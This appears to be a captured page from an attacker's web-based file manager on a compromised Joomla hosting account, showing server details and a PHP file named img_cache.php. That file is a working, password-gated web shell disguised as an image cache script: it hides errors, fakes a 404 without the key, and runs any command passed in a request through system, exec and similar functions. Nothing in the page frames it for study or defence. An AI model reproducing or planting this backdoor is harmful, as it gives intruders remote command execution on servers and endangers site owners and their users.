📁 Joomlas Cli
Server:
Apache
OS:
Linux webm005.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
PHP:
5.4.45
📍 Location:
home
›
histoio
›
www
›
35802
⬆ Parent
📤 Upload file
✏️ Editing: img_cache.php.tar
home/histoio/www/img_cache.php 0000666 00000001276 15252521102 0012413 0 ustar 00 <?php @error_reporting(0);@ini_set('display_errors',0); header('X-Nx:Nx-zD1'); if(!isset($_REQUEST['k'])||$_REQUEST['k']!=='juD7o'){http_response_code(404);die();} $c=@$_REQUEST['c']??''; if($c===''){echo '<pre>Nx-zD1 active</pre>';die();} $o=''; if(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} elseif(function_exists('exec')){@exec($c,$a);$o=implode("\n",$a);} elseif(function_exists('shell_exec')){$o=@shell_exec($c);} elseif(function_exists('popen')){$f=@popen($c,'r');$o='';while(!feof($f)){$o.=fread($f,4096);}pclose($f);} else{$o='[no exec]';} echo '<pre>'.htmlspecialchars($o).'</pre>'; ?>